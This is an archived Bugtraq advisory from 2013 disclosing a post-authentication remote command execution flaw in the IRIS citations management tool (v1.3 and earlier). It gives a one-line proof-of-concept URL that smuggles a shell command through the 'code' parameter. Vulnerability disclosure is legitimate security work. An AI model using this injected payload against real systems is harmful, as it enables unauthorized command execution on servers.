[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

I Read It Somewhere (IRIS) citations management tool <= v1.3 (post auth) Remote Command Execution

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: I Read It Somewhere (IRIS) citations management tool <= v1.3 (post auth) Remote Command Execution
From: aeon.s.flux@xxxxxxxxx
Date: Sat, 9 Feb 2013 21:11:24 GMT

A vulnerability exists in IRIS citations management tool which allows a low 
privileged attacker to execute arbitrary commands.

Details can be found on my blog:
https://infosecabsurdity.wordpress.com/2013/02/09/iris-citations-management-tool-post-auth-remote-command-execution/
 

PoC:

http://[target]/[path]/index.php?p=add&import=spnro&code=a"+-T+0.1+||echo+`id`+>+/tmp/luls||"

~ aeon

Prev by Date: Atmel "secure" crypto co-processor series microprocessors (AT91SAM7XC) leaking keys, plus bonus DESFire hack
Next by Date: [slackware-security] openssl (SSA:2013-042-01)
Previous by thread: Re: Atmel "secure" crypto co-processor series microprocessors (AT91SAM7XC) leaking keys, plus bonus DESFire hack
Next by thread: [slackware-security] openssl (SSA:2013-042-01)
Index(es):
- Date
- Thread